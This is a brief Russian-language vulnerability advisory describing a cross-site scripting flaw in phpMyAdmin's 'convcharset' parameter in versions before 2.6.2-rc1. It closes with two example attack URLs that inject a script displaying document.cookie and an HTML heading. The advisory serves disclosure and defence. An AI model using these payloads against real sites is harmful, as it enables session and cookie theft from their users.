Программа: phpMyAdmin версии до 2.6.2-rc1
Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к важным данным других
пользователей. Уязвимость обнаружена при
обработке входных данных в параметре 'convcharset'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.
Примеры:
http://[target]/phpmyadmin/index.php?pma_username=&pma_password =&server=1&lang=en-iso-8859-1&convcharset=\"><script>
alert(document.cookie)</script>
http://[target]/phpmyadmin/index.php?pma_username=&pma_password =&server=1&lang=en-iso-8859-1&convcharset=\"><h1>
XSS</h1>